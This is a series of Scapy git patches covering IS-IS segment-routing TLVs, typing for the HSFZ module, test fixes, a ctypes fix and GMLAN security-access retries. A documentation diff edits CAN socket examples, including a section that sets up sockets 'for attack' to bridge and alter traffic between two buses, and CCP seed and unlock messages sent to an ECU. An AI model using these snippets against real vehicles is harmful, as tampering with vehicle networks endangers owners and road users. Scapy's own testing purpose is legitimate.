+_isis_subtlv_classes_4 = { + 2: "ISIS_SRCapabilitiesSubTLV", + 19: "ISIS_SRAlgorithmSubTLV", +} + +_isis_subtlv_names_4 = { + 2: "Segment Routing Capability sub TLV", + 19: "Segment Routing Algorithm", +} + + +def _ISIS_GuessSubTlvClass_4(p, **kargs): + return _ISIS_GuessTlvClass_Helper( + _isis_subtlv_classes_4, "ISIS_GenericSubTlv", p, **kargs) + + +class ISIS_SRGBDescriptorEntry(Packet): + name = "ISIS SRGB Descriptor" + fields_desc = [ + ThreeBytesField("range", 0), + PacketField("sid_label", None, ISIS_SIDLabelSubTLV) + ] + + def extract_padding(self, s): + return "", s + + +class ISIS_SRCapabilitiesSubTLV(ISIS_GenericSubTlv): + name = "ISIS SR Capabilities TLV" + fields_desc = [ + ByteEnumField("type", 2, _isis_subtlv_names_3), + FieldLenField( + "len", + None, + length_of="srgb_ranges", + adjust=lambda pkt, x: x + 1, + fmt="B"), + FlagsField( + "flags", 0, 8, + ["res1", "res2", "res3", "res4", "res5", "res6", "V", "I"]), + PacketListField( + "srgb_ranges", + [], + ISIS_SRGBDescriptorEntry, + length_from=lambda pkt: pkt.len - 1) + ] + + +class ISIS_SRAlgorithmSubTLV(ISIS_GenericSubTlv): + name = "ISIS SR Algorithm sub TLV" + fields_desc = [ + ByteEnumField("type", 19, _isis_subtlv_names_4), + FieldLenField("len", None, length_of="algorithms", fmt="B"), + FieldListField( + "algorithms", + [0], + ByteField("", 0), + count_from=lambda pkt:pkt.len) + ] + + ####################################################################### # ISIS TLVs # ####################################################################### @@ -427,7 +541,8 @@ class ISIS_64bitAdministrativeTagSubTlv(ISIS_GenericSubTlv): 137: "ISIS_DynamicHostnameTlv", 232: "ISIS_Ipv6InterfaceAddressTlv", 236: "ISIS_Ipv6ReachabilityTlv", - 240: "ISIS_P2PAdjacencyStateTlv" + 240: "ISIS_P2PAdjacencyStateTlv", + 242: "ISIS_RouterCapabilityTlv" } _isis_tlv_names = { @@ -687,6 +802,28 @@ class ISIS_ProtocolsSupportedTlv(ISIS_GenericTlv): ] +class ISIS_RouterCapabilityTlv(ISIS_GenericTlv): + name = "ISIS Router Capability TLV" + fields_desc = [ + ByteEnumField("type", 242, _isis_tlv_names), + FieldLenField( + "len", + None, + length_of="subtlvs", + adjust=lambda pkt, x: x + 5, + fmt="B"), + IPField("routerid", "0.0.0.0"), + FlagsField( + "flags", 0, 8, + ["S", "D", "res1", "res2", "res3", "res4", "res5", "res6"]), + PacketListField( + "subtlvs", + [], + _ISIS_GuessSubTlvClass_4, + length_from=lambda pkt: pkt.len - 5) + ] + + ####################################################################### # ISIS Old-Style TLVs # ####################################################################### diff --git a/test/contrib/isis.uts b/test/contrib/isis.uts index 78302beb99e..217cc5ff2aa 100644 --- a/test/contrib/isis.uts +++ b/test/contrib/isis.uts @@ -97,7 +97,12 @@ p = Dot3(dst="09:00:2b:00:00:05",src="00:00:00:aa:00:8c")/LLC()/ISIS_CommonHdr() ISIS_ExtendedIpPrefix(metric=10, pfx="10.1.0.109/30", subtlvindicator=1, subtlvs=[ ISIS_32bitAdministrativeTagSubTlv(tags=[321, 123]), - ISIS_64bitAdministrativeTagSubTlv(tags=[54321, 4294967311]) + ISIS_64bitAdministrativeTagSubTlv(tags=[54321, 4294967311]), + ISIS_PrefixSegmentIdentifierSubTlv(flags="P", algorithm=0, idx=20) + ]), + ISIS_ExtendedIpPrefix(metric=10, pfx="10.20.30.40/32", subtlvindicator=1, + subtlvs=[ + ISIS_PrefixSegmentIdentifierSubTlv(flags=["L", "V", "N"], algorithm=0, sid=1000) ]), ISIS_ExtendedIpPrefix(metric=10, pfx="10.1.0.181/30", subtlvindicator=1, subtlvs=[ @@ -130,12 +135,37 @@ p = Dot3(dst="09:00:2b:00:00:05",src="00:00:00:aa:00:8c")/LLC()/ISIS_CommonHdr() ), ISIS_ExternalIpReachabilityTlv( type=130 + ), + ISIS_RouterCapabilityTlv( + type=242, + routerid="10.20.30.40", + subtlvs=[ + ISIS_SRCapabilitiesSubTLV( + flags='I', + srgb_ranges=[ + ISIS_SRGBDescriptorEntry( + range=1000, + sid_label=ISIS_SIDLabelSubTLV( + sid=10 + ) + ), + ISIS_SRGBDescriptorEntry( + range=5000, + sid_label=ISIS_SIDLabelSubTLV( + idx=20 + ) + ), + ] + ), + ISIS_SRAlgorithmSubTLV(algorithms=[0, 1]) + ] ) ]) p = p.__class__(raw(p)) -assert(p[ISIS_L2_LSP].pdulength == 278) -assert(p[ISIS_L2_LSP].checksum == 0xc0a9) +assert(p[ISIS_L2_LSP].pdulength == 332) +assert(p[ISIS_L2_LSP].checksum == 0x074f) assert(p[ISIS_ExtendedIpReachabilityTlv].pfxs[1].subtlvs[1].tags[0]==54321) +assert(p[ISIS_ExtendedIpReachabilityTlv].pfxs[2].subtlvs[0].sid==1000) assert(p[ISIS_Ipv6ReachabilityTlv].pfxs[1].subtlvs[0].len==8) assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[0].address=='172.16.8.4') assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[1].localid==418) @@ -143,3 +173,7 @@ assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[3].maxbw==1250000 assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[4].unrsvbw[0]==125000000) assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[5].temetric==16777214) assert(p[ISIS_ExternalIpReachabilityTlv].type==130) +assert(p[ISIS_RouterCapabilityTlv].type==242) +assert(p[ISIS_RouterCapabilityTlv].subtlvs[0].srgb_ranges[0].range==1000) +assert(p[ISIS_RouterCapabilityTlv].subtlvs[0].srgb_ranges[0].sid_label.sid==10) +assert(p[ISIS_RouterCapabilityTlv].subtlvs[1].algorithms==[0, 1]) \ No newline at end of file From 17a9af15993890c3d93c393d92dc4e5b69a9e592 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 9 Dec 2020 01:35:17 +0100 Subject: [PATCH 0435/1632] Add typing for HSFZ (#2884) * Add typing for HSFZ * change import from typing to scapy.compat * fix Packet_metaclass import --- .config/mypy/mypy_enabled.txt | 6 +++--- scapy/contrib/automotive/bmw/hsfz.py | 11 +++++++++++ 2 files changed, 14 insertions(+), 3 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 732d70424af..f322d7ada9f 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -27,11 +27,11 @@ scapy/utils.py scapy/utils6.py # LAYERS - +scapy/layers/can.py +scapy/layers/l2.py # CONTRIB #scapy/contrib/http2.py # needs to be fixed scapy/contrib/roce.py -scapy/layers/can.py scapy/contrib/automotive/gm/gmlanutils.py -scapy/layers/l2.py +scapy/contrib/automotive/bmw/hsfz.py diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index e06914091b2..dc985172e61 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -10,6 +10,9 @@ import struct import socket import time + +from scapy.compat import Tuple, Any, Type + from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.fields import IntField, ShortEnumField, XByteField from scapy.layers.inet import TCP @@ -40,19 +43,23 @@ class HSFZ(Packet): ] def hashret(self): + # type: () -> bytes hdr_hash = struct.pack("B", self.src ^ self.dst) pay_hash = self.payload.hashret() return hdr_hash + pay_hash def answers(self, other): + # type: (Packet) -> int if other.__class__ == self.__class__: return self.payload.answers(other.payload) return 0 def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, bytes] return s[:self.length - 2], s[self.length - 2:] def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes """ This will set the LenField 'length' to the correct value. """ @@ -72,6 +79,7 @@ def post_build(self, pkt, pay): class HSFZSocket(StreamSocket): def __init__(self, ip='127.0.0.1', port=6801): + # type: (str, int) -> None self.ip = ip self.port = port s = socket.socket() @@ -81,6 +89,7 @@ def __init__(self, ip='127.0.0.1', port=6801): class ISOTP_HSFZSocket(HSFZSocket): def __init__(self, src, dst, ip='127.0.0.1', port=6801, basecls=ISOTP): + # type: (int, int, str, int, Type[Packet]) -> None super(ISOTP_HSFZSocket, self).__init__(ip, port) self.src = src self.dst = dst @@ -88,6 +97,7 @@ def __init__(self, src, dst, ip='127.0.0.1', port=6801, basecls=ISOTP): self.outputcls = basecls def send(self, x): + # type: (bytes) -> None if not isinstance(x, ISOTP): raise Scapy_Exception( "Please provide a packet class based on ISOTP") @@ -100,5 +110,6 @@ def send(self, x): HSFZ(src=self.src, dst=self.dst) / x) def recv(self, x=MTU): + # type: (int) -> Any pkt = super(ISOTP_HSFZSocket, self).recv(x) return self.outputcls(bytes(pkt[1])) From af9537bf5c99f6a2ba646eb170816c259f735ed2 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 28 Nov 2020 19:20:57 +0100 Subject: [PATCH 0436/1632] Improve runtime of obdscanner.uts --- test/tools/obdscanner.uts | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index a221d8f65b3..2a36efcdc13 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -307,16 +307,30 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-f", "-1", "-3"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.20", "-f", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out1, std_err1 = result.communicate() - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-f", "-1", "-3"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + except Exception as e: + print(e) + finally: + tester.send(b"\x01\xff\xff\xff\xff") + sim.join(timeout=10) + expected_output = ["256 requests were sent", "1 answered"] + retest = False + try: + for out in expected_output: + assert bytes_encode(out) in bytes_encode(std_out1) + except AssertionError: + retest = True + if not retest: + exit(0) + try: + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.20", "-f", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out2, std_err2 = result.communicate() except Exception as e: print(e) finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) - expected_output = ["256 requests were sent", "1 requests were sent, 1 answered"] for out in expected_output: assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) From ee21931bbbbe94f801a6e44031cb117eba141e16 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Wed, 9 Dec 2020 10:38:51 +0100 Subject: [PATCH 0437/1632] Revert "Improve runtime of obdscanner.uts" This reverts commit af9537bf5c99f6a2ba646eb170816c259f735ed2. --- test/tools/obdscanner.uts | 20 +++----------------- 1 file changed, 3 insertions(+), 17 deletions(-) diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 2a36efcdc13..a221d8f65b3 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -307,30 +307,16 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.20", "-f", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-f", "-1", "-3"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out1, std_err1 = result.communicate() - except Exception as e: - print(e) - finally: - tester.send(b"\x01\xff\xff\xff\xff") - sim.join(timeout=10) - expected_output = ["256 requests were sent", "1 answered"] - retest = False - try: - for out in expected_output: - assert bytes_encode(out) in bytes_encode(std_out1) - except AssertionError: - retest = True - if not retest: - exit(0) - try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.20", "-f", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-f", "-1", "-3"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out2, std_err2 = result.communicate() except Exception as e: print(e) finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) + expected_output = ["256 requests were sent", "1 requests were sent, 1 answered"] for out in expected_output: assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) From a6ded9eb98f6c702a20bab69a35f8ef172707494 Mon Sep 17 00:00:00 2001 From: kylma Date: Tue, 8 Dec 2020 13:14:00 +0100 Subject: [PATCH 0438/1632] update outdated code example --- doc/scapy/layers/automotive.rst | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 8a35d193d66..70e537db2c4 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -211,30 +211,30 @@ Creating a simple native CANSocket:: load_contrib('cansocket') # Simple Socket - socket = CANSocket(iface="vcan0") + socket = CANSocket(channel="vcan0") Creating a native CANSocket only listen for messages with Id == 0x200:: - socket = CANSocket(iface="vcan0", can_filters=[{'can_id': 0x200, 'can_mask': 0x7FF}]) + socket = CANSocket(channel="vcan0", can_filters=[{'can_id': 0x200, 'can_mask': 0x7FF}]) Creating a native CANSocket only listen for messages with Id >= 0x200 and Id <= 0x2ff:: - socket = CANSocket(iface="vcan0", can_filters=[{'can_id': 0x200, 'can_mask': 0x700}]) + socket = CANSocket(channel="vcan0", can_filters=[{'can_id': 0x200, 'can_mask': 0x700}]) Creating a native CANSocket only listen for messages with Id != 0x200:: - socket = CANSocket(iface="vcan0", can_filters=[{'can_id': 0x200 | CAN_INV_FILTER, 'can_mask': 0x7FF}]) + socket = CANSocket(channel="vcan0", can_filters=[{'can_id': 0x200 | CAN_INV_FILTER, 'can_mask': 0x7FF}]) Creating a native CANSocket with multiple can_filters:: - socket = CANSocket(iface='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}, + socket = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}, {'can_id': 0x400, 'can_mask': 0x7ff}, {'can_id': 0x600, 'can_mask': 0x7ff}, {'can_id': 0x7ff, 'can_mask': 0x7ff}]) Creating a native CANSocket which also receives its own messages:: - socket = CANSocket(iface="vcan0", receive_own_messages=True) + socket = CANSocket(channel="vcan0", receive_own_messages=True) .. image:: ../graphics/animations/animation-scapy-native-cansocket.svg @@ -290,8 +290,8 @@ Import modules:: Create can sockets for attack:: - socket0 = CANSocket(iface='vcan0') - socket1 = CANSocket(iface='vcan1') + socket0 = CANSocket(channel='vcan0') + socket1 = CANSocket(channel='vcan1') Create a function to send packet with threading:: @@ -307,8 +307,8 @@ Create a function for forwarding or change packets:: Create a function to bridge and sniff between two sockets:: def bridge(): - bSocket0 = CANSocket(iface='vcan0') - bSocket1 = CANSocket(iface='vcan1') + bSocket0 = CANSocket(channel='vcan0') + bSocket1 = CANSocket(channel='vcan1') bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=1) bSocket0.close() bSocket1.close() @@ -420,7 +420,7 @@ If we aren't interested in the DTO of an ECU, we can just send a CRO message lik Sending a CRO message:: pkt = CCP(identifier=0x700)/CRO(ctr=1)/CONNECT(station_address=0x02) - sock = CANSocket(iface=can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=250000)) + sock = CANSocket(bustype='socketcan', channel='vcan0') sock.send(pkt) If we are interested in the DTO of an ECU, we need to set the basecls parameter of the @@ -428,7 +428,7 @@ CANSocket to CCP and we need to use sr1: Sending a CRO message:: cro = CCP(identifier=0x700)/CRO(ctr=0x53)/PROGRAM_6(data=b"\x10\x11\x12\x10\x11\x12") - sock = CANSocket(iface=can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=250000), basecls=CCP) + sock = CANSocket(bustype='socketcan', channel='vcan0', basecls=CCP) dto = sock.sr1(cro) dto.show() ###[ CAN Calibration Protocol ]### From 55dd3e485298ae59ce83825b8e54fec107da2535 Mon Sep 17 00:00:00 2001 From: kylma Date: Tue, 8 Dec 2020 13:15:52 +0100 Subject: [PATCH 0439/1632] uniformize syntax for load_layer/load_contrib, double-quotes for load_layer --- doc/scapy/layers/automotive.rst | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 70e537db2c4..7c5f357b33a 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -56,7 +56,7 @@ How-To Send and receive a message over Linux SocketCAN:: - load_layer('can') + load_layer("can") load_contrib('cansocket') socket = CANSocket(channel='can0') @@ -70,7 +70,7 @@ Send and receive a message over Linux SocketCAN:: Send a message over a Vector CAN-Interface:: import can - load_layer('can') + load_layer("can") conf.contribs['CANSocket'] = {'use-python-can' : True} load_contrib('cansocket') from can.interfaces.vector import VectorBus @@ -471,7 +471,7 @@ The class ``ISOTPSocket`` can be set to a ``ISOTPNativeSocket`` or a ``ISOTPSoft The decision is made dependent on the configuration ``conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': True}`` (to select ``ISOTPNativeSocket``) or ``conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False}`` (to select ``ISOTPSoftSocket``). This will allow you to write platform independent code. Apply this configuration before loading the ISOTP layer -with ``load_contrib("isotp")``. +with ``load_contrib('isotp')``. Another remark in respect to ISOTPSocket compatibility. Always use with for socket creation. Example:: @@ -770,8 +770,8 @@ Customization example:: If one wants to work with this custom additions, these can be loaded at runtime to the Scapy interpreter:: - >>> load_contrib("automotive.uds") - >>> load_contrib("automotive.OEM-XYZ.car-model-xyz") + >>> load_contrib('automotive.uds') + >>> load_contrib('automotive.OEM-XYZ.car-model-xyz') >>> pkt = UDS()/UDS_WDBI()/DBI_IP(IP='192.168.2.1', SUBNETMASK='255.255.255.0', DEFAULT_GATEWAY='192.168.2.1') @@ -900,7 +900,7 @@ This example shows a SOME/IP message which requests a service 0x1234 with the me Load the contribution:: - load_contrib("automotive.someip") + load_contrib('automotive.someip') Create UDP package:: @@ -937,7 +937,7 @@ In this example a SOME/IP SD offer service message is shown with an IPv4 endpoin Load the contribution:: - load_contrib("automotive.someip") + load_contrib('automotive.someip') Create UDP package:: From 81603d1d8b7b7dca5aa3509251cf712d2d8b94d5 Mon Sep 17 00:00:00 2001 From: kylma Date: Tue, 8 Dec 2020 17:03:23 +0100 Subject: [PATCH 0440/1632] add load_layer to CCP example --- doc/scapy/layers/automotive.rst | 1 + 1 file changed, 1 insertion(+) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 7c5f357b33a..b1427672000 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -412,6 +412,7 @@ can be interpreted from the command of the associated CRO object. Creating a CRO message:: + load_contrib('automotive.ccp') CCP(identifier=0x700)/CRO(ctr=1)/CONNECT(station_address=0x02) CCP(identifier=0x711)/CRO(ctr=2)/GET_SEED(resource=2) CCP(identifier=0x711)/CRO(ctr=3)/UNLOCK(key=b"123456") From 46fa40fde4049ad7770481f8806c59640df24059 Mon Sep 17 00:00:00 2001 From: Vincent Bernat Date: Sun, 6 Dec 2020 12:07:32 +0100 Subject: [PATCH 0441/1632] Fix ctypes usage with Python 3.9 There is a regression in Python 3.9 with the `find_library()` function: >>> import ctypes.util >>> ctypes.util.find_library("libc") Traceback (most recent call last): File "", line 1, in File "/usr/lib/python3.9/ctypes/util.py", line 341, in find_library _get_soname(_findLib_gcc(name)) or _get_soname(_findLib_ld(name)) File "/usr/lib/python3.9/ctypes/util.py", line 147, in _findLib_gcc if not _is_elf(file): File "/usr/lib/python3.9/ctypes/util.py", line 99, in _is_elf with open(filename, 'br') as thefile: FileNotFoundError: [Errno 2] No such file or directory: b'liblibc.a' A workaround is to use `find_library("c")` instead. It also works in older versions of Python and that's already what's used in `contrib/isotp.py`. Python issue reported here: https://bugs.python.org/issue42580 Signed-off-by: Vincent Bernat --- scapy/arch/bpf/core.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index 6fbdf447eef..4ff71b4eb5e 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -32,7 +32,7 @@ # ctypes definitions -LIBC = cdll.LoadLibrary(find_library("libc")) +LIBC = cdll.LoadLibrary(find_library("c")) LIBC.ioctl.argtypes = [c_int, c_ulong, c_char_p] LIBC.ioctl.restype = c_int From 42d58d872959fb95686428fb61338d9790df9217 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 11 Dec 2020 15:44:28 +0100 Subject: [PATCH 0442/1632] Stabilize pipetool test --- test/pipetool.uts | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/test/pipetool.uts b/test/pipetool.uts index 8ccbb5cf1bb..bc3fda67cad 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -232,10 +232,9 @@ import mock r, w = os.pipe() os.write(w, b"X") -mocked_l2listen = mock.patch("scapy.config.conf.L2listen", return_value=Bunch(close=lambda *args: None, fileno=lambda: r, recv=lambda *args: Raw("data"))) -mocked_l2listen.start() - -try: +@mock.patch("scapy.scapypipes.conf.L2listen") +def _test(l2listen): + l2listen.return_value=Bunch(close=lambda *args: None, fileno=lambda: r, recv=lambda *args: Raw("data")) p = PipeEngine() s = SniffSource() assert s.s is None @@ -244,11 +243,14 @@ try: s > d1 > c p.add(s) p.start() - assert c.q.get(2) + x = c.q.get(2) + assert bytes(x) == b"data" assert s.s is not None p.stop() + +try: + _test() finally: - mocked_l2listen.stop() os.close(r) os.close(w) From 9ba1eb8d25de263850f6d9d9b597a61b07209e27 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 3 Dec 2020 09:21:00 +0100 Subject: [PATCH 0443/1632] Minor improvements to the gmlan utilities --- scapy/contrib/automotive/gm/gmlanutils.py | 4 + test/contrib/automotive/gm/gmlanutils.uts | 300 +++++++++++----------- 2 files changed, 159 insertions(+), 145 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index 36fce7cbf79..a5cb4eb9c77 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -159,6 +159,10 @@ def GMLAN_GetSecurityAccess(sock, key_function, level=1, timeout=None, verbose=N print("Requesting seed..") resp = sock.sr1(request, timeout=timeout, verbose=0) if not _check_response(resp, verbose): + if resp is not None and resp.returnCode == 0x37 and retry: + if verbose: + print("RequiredTimeDelayNotExpired. Wait 10s.") + time.sleep(10) if verbose: print("Negative Response.") continue diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 4b93405ef7b..39a02de8320 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -151,9 +151,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True + res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True + thread.join(timeout=5) + assert res -thread.join(timeout=5) assert ecusimSuccessfullyExecuted == True = Negative, immediate negative response @@ -168,9 +169,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False - -thread.join(timeout=5) + res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False + thread.join(timeout=5) + assert res = Negative, timeout with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: @@ -181,7 +182,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=2, started_callback=started.set) pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) isotpsock2.send(pending) ack = b"\x74" @@ -191,9 +192,11 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True - -thread.join(timeout=5) + res = GMLAN_RequestDownload(isotpsock, 4, timeout=2) == True + join = thread.join(timeout=5) + print("JOIN", join) + print("Result", repr(res)) + assert res = Positive, hold response pending for several messages tout = 0.8 @@ -215,11 +218,15 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base started.wait(timeout=5) starttime = time.time() # may be inaccurate -> on some systems only seconds precision result = GMLAN_RequestDownload(isotpsock, 4, timeout=repeats*tout+0.5) - assert result endtime = time.time() + join = thread.join(timeout=5) + print("Result", repr(result)) + print("Join", join) + assert result + print(endtime - starttime) + print(tout * (repeats - 1)) assert (endtime - starttime) >= tout * (repeats - 1) -thread.join(timeout=5) = Negative, negative response after response pending started = threading.Event() @@ -235,9 +242,11 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False + res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False + thread.join(timeout=5) + assert res + -thread.join(timeout=5) = Negative, timeout after response pending started = threading.Event() @@ -251,9 +260,11 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_RequestDownload(isotpsock, 4, timeout=0.3) == False + res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.3) == False + thread.join(timeout=5) + assert res + -thread.join(timeout=5) = Positive, pending message from different service interferes while pending started = threading.Event() @@ -272,9 +283,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True - -thread.join(timeout=5) + res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True + thread.join(timeout=5) + assert res = Positive, negative response from different service interferes while pending started = threading.Event() @@ -293,9 +304,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True - -thread.join(timeout=5) + res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True + thread.join(timeout=5) + assert res ################### RETRY = Positive, first: immediate negative response, retry: Positive @@ -324,10 +335,11 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_RequestDownload(isotpsock, 4, timeout=1, retry=1) == True + res = GMLAN_RequestDownload(isotpsock, 4, timeout=1, retry=1) == True + thread.join(timeout=5) + assert res assert ecusimSuccessfullyExecuted == True -thread.join(timeout=5) ############################################################################## @@ -354,10 +366,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = Positive, short payload, scheme 